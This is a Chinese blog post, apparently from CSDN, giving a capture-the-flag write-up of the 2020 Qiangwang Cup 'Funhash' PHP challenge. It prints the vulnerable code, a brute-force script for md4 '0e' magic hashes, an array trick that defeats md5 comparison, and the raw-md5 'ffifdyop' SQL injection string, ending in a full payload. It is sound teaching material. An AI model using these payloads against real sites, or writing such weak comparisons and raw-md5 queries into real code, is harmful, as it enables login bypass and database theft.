2020强网杯强网先锋之Funhash

最新推荐文章于 2023-12-21 09:56:22 发布
最新推荐文章于 2023-12-21 09:56:22 发布
阅读量1.1k 收藏 5
点赞数 7
分类专栏: ctf 文章标签: 强网杯 ctf hash
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46091464/article/details/108190466
版权

作为小白,也应该去见见世面,于是参加了2020强网杯
也让自己学到的了不少。下面是自己关于Funhash的解题思路

2020强网杯强网先锋之Funhash

直接上源代码

<?php
include 'conn.php';
highlight_file("index.php");
//level 1
if ($_GET["hash1"] != hash("md4", $_GET["hash1"]))
{
    die('level 1 failed');
}
//level 2
if($_GET['hash2'] === $_GET['hash3'] || md5($_GET['hash2']) !== md5($_GET['hash3']))
{
    die('level 2 failed');
}
//level 3
$query = "SELECT * FROM flag WHERE password = '" . md5($_GET["hash4"],true) . "'";
$result = $mysqli->query($query);
$row = $result->fetch_assoc(); 
var_dump($row);
$result->free();
$mysqli->close();
?>

审计了一下代码,发现要得到flag就需要绕过3次if条件

1.绕过level 1

$_GET["hash1"] == hash("md4", $_GET["hash1"])
就可以绕过。
先介绍一下自己最开始的错误,因为这里是!=就可能存在PHP字符类型的转换
于是乎自己写了一个脚本,跑出了hash1=21的时候可以。

但是自己输入21的时候还是没有绕过,之后才发现是因为$_GET[“hash1”]和hash(“md4”, $_GET[“hash1”])都是string类型。
所以就失败了

在最后通过对比md5的漏洞分析PHP在处理科学计数法的时候如果是0exxx会当成0。
所以如果一个数字是0exxx它经过md4最后也是0exxx 那么他们就(==弱等于)
在这里需要说明一下0e后面必须是数字才能实现(==弱等于)

直接上payload

#by Firebasky
<?php
for($a=1;$a<=1000000000;$a++){
    $b='0e'.$a;
    $c=(substr(hash("md4",$b),2));//取后面满足是数字
    $d=(substr(hash("md4",$b),0,true).substr(hash("md4",$b),1,true));//取前面满足是0e
    if($d==='0e'){
        if(ctype_digit($c)){//is_numeric()函数是有漏洞。用ctype_digit();
                echo $b."success";
                break;
        }else{
            echo "fail";
        }
    }
}
//0e251288019
//0e898201062

0e251288019和0e898201062都可以绕过
还要说明一下是is_numeric()函数有漏洞
当数字里面有e的话is_numeric()函数会当成xxx*10^xxx相当于科学计数法

2.绕过level 2
直接使用数组绕过,原因是md5在处理数组的时候默认是NULL payload: hash2[]=1,hash3[]=2

3.绕过level 3
原理是md5碰撞构造出’or’xxxx
直接payload:hash4=ffifdyop
最终payload:
hash1=0e251288019&hash2[]=1&hash3[]=2&hash4=ffifdyop

总结:
让我们知道了不仅仅只有md5有碰撞,其他的加密算法也可能存在,只有满足条件就可以绕过。
所以我们在写代码配置的时候最好使用===(强类型)
最后拓展一下md5

if($a==md5($a)){
echo 'success';
}
#payload:0e215962017

彩蛋:如果对你有帮助的话记得点赞评论哟~

Firebasky
关注
  • 7
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
2020强网杯-强网先锋-bank
菜鸟之路
08-25 1058
2020强网杯-强网先锋-bank bank这题首先需要nc一个ip地址,发现发现返回 sha256(XXX+yhB1iPWH3ENjHhf12) == 05401c749eee0ccb5a9cfb96eae3d8909a489113066f3a0f185580ac60a18403 Give me xxx: #填对以后要填teamtoken teamtoken: #要填写一个用户名 input your name: 老密码学门槛了,要算出xxx的值。爆破完事。 然后试了一下,发现有时间限制,操作时间超过一
强网杯 WriteUp By Nu1L
08-02
强网杯 WriteUp By Nu1L》是关于2022年第六届“强网杯”全国网络安全挑战赛的一份技术分析报告,由Nu1L团队撰写。在这篇WriteUp中,作者分享了他们在竞赛中遇到的各种挑战和解决策略,涵盖了Pwn、Reverse、Find_...
2023强网杯——强网先锋——SpeedUp
最新发布
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
12-21 594
在OEIS上查询,得到了这组数列,直接得到2的27次方的值是4495662081,对其进行sha256加密就可以得到flag。这个题目要求的是2的27次方的阶乘中的每一位数的和。算出2的1到n次方的阶乘的每位数字和,得到一个数列。
2020第四届“强网杯“全国网络安全挑战赛】强网先锋 Funhash
weixin_45844670的博客
08-24 1167
题目链接:http://39.101.177.96/ <?php include 'conn.php'; highlight_file("index.php"); //level 1 if ($_GET["hash1"] != hash("md4", $_GET["hash1"])) { die('level 1 failed'); } //level 2 if($_GET['hash2'] === $_GET['hash3'] || md5($_GET['hash2']) !== md5(
2020强网杯部分题目复现
m0re's blog
08-27 2513
title: 强网杯赛后总结 tags: CTF 强网先锋 Funhash <?php include 'conn.php'; highlight_file("index.php"); //level 1 if ($_GET["hash1"] != hash("md4", $_GET["hash1"])) { die('level 1 failed'); } //level 2 if($_GET['hash2'] === $_GET['hash3'] || md5($_GET['ha.
2020强网杯 部分wp
fly夏天的博客
08-26 1661
2020强网杯 部分wp 彩笔参加了这次强网杯,感觉又被扎心,果然是得PWN者得天下。 1. BANK 这题虽然是个PWN,但是居然被我这个web小白做出来了,我感觉我这种做法是个非预期解,也不知道大佬是如何操作的。 首先,远程nc连接,提示解密拼接字符串的sha256加密。编写python脚本爆破。简易脚本如下: import hashlib,os s = 'a36MUMAX1VSQQcEHJ' #伪加密部分字符串 result = 'f8a38643f58bf7d6523d8c43f81a9329d
2020强网杯flower题wp
sln_1550的博客
08-27 519
从apk中解压出libnative.so 拖入IDA,发现加密算法在sub_F34中: 关键部分有花指令,patch后可以直接F5看C源码 整个代码逻辑用python描述如下: 主要操作是对输入的flag字符串前后各用首字节和尾字节填充满128字节,然后加密变化后和固定字符串比较。 根据算法逆写解密程序并执行出结果 ...
2019第三届强网杯-强网先锋-ADwp
or1d1的博客
05-27 5033
周末参加了一下强网杯,emmm这些题目不是我等弟弟所能解答的。 鲲or鳗orGame题目wphttps://blog.csdn.net/or1d1/article/details/90599659 其他大佬的wp https://skysec.top/2019/05/25/2019-%E5%BC%BA%E7%BD%91%E6%9D%AFonline-Web-Writeup/#uploa...
强网杯-强网先锋辅助
、moddemod
01-04 1282
题目描述 flag=open("flag","rb").read() from Crypto.Util.number import getPrime, bytes_to_long import time p=getPrime(1024) q=getPrime(1024) e = 65537 n=p*q m=bytes_to_long(flag) c=pow(m,e,n) print c,e,n ...
2020强网杯部分题WP
z4ky的博客
08-25 1394
侧防 IDA打开程序 写脚本逆向即可 str_enc = "Lx|dTUwe\IvNhCBOLqDNfW}ImFZCtiyxO\PW^ebD" str_ = [] for i in range(0,len(str_enc ), 4): str_ .append(str_enc [i+1]) str_ .append(str_enc [i+2]) str_ .append(str_enc [i+3]) str_ .append(str_enc [i]) print
强网杯2022 pwn 赛题解析.docx
12-18
强网杯2022 Pwn赛题解析】 在网络安全竞赛“强网杯”中,Pwn类赛题往往考验参赛者对内存安全漏洞利用的理解和技术应用。本题涉及的是一道基于高版本glibc的House of Apple攻击,这是一种利用大型bin(large bin)...
强网杯2021 Web.zip
12-17
【标题】:“强网杯2021 Web.zip”是一个与网络安全竞赛相关的压缩文件,名为“强网杯”,这通常是指“强网杯”网络安全技能大赛。该比赛是中国最高级别的网络安全竞赛之一,旨在提高参赛者的网络防御和攻防能力,...
2021年强网杯赛题.zip
12-17
强网杯
2018强网杯CTF-题目整理-校本图片Readme.zip
12-18
强网杯 2018强网杯CTF___题目整理 │ ├── 01Misc-4题 │ ├── 题目名称:ai-nimals │ │ └── 题目名称:ai-nimals.mhtml │ ├── 题目名称:welcome │ │ └── 题目名称:welcome.mhtml │ ├── ...
wmctf2020 Make PHP Great Again
Firebasky的博客
08-15 4721
这个题目是之后赵师傅发了wp,自己进行复现的,因为自己比较菜,所以好多都是看师傅们的博客。 于是自己也来记录记录,下面还有一些问题,希望大佬们可以回答一下下。非常感谢!!! 题目代码: <?php highlight_file(__FILE__); require_once 'flag.php'; if(isset($_GET['file'])) { $a=($_GET['file']); require_once($a); } 第一个是可以通过上传PHP_SESSION_UPLOAD_.
攻防世界web新手练习区详细(小白入门)
Firebasky的博客
05-06 3853
最近自己也做了一下攻防世界的web题,自己作为一个小白也分享一下自己的感受理解和自己的思路。 (大佬绕过) 话不多说进入正题: 1、view_source 直接F12查看源代码 2、 robots 首先理解robots是什么? robots是网站跟爬虫间的协议,用简单直接的txt格式文本方式告诉对应的爬虫被允许的权限,也就是说robots.txt是搜索引擎中搜索引擎网站的时候要查看的第一个文件。...
ssrf绕过filter_var函数使用file_get_contents读取任意文件
Firebasky的博客
09-27 2858
前几天师傅给我发了一个ssrf的题目,是一个比赛题目,但是也一直没有拿下,就是可以执行xss,但是flag存在根目录下面,要需要读取文件,百度了一下没有发现新思路。在之后师傅给我提供了新思路。 1. ssrf绕过filter_var函数使用file_get_contents读取任意文件 直接上源代码 <?php highlight_file(__FILE__); $argv[1]=$_GET['a']; if(filter_var($argv[1],FILTER_VALIDATE_URL)) {.
以管理员身份登录系统 分值: 450 以管理员身份登录即可获取通关密码(重置即可,无需登录)
Firebasky的博客
05-27 2831
解密关的第一题。 1.题的来源 昨天做了一个网络安全实验室的一个解密关的第一题。 地址:http://lab1.xseclab.com/password1_dc178aa12e73cfc184676a4100e07dac/index.php 2题目思考 这个题不能进行登录,自己也试了试没法进行登录,但是可以进行重置密码操作,最开始自己尝试了一下用admin重置密码。结果因为不知道邮箱。第一时间先到是去抓包看看在数据包里面有没有信息,结果查看了半天没有发现。失败! 然后自己试了试用其他账号重置密码发现可以
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值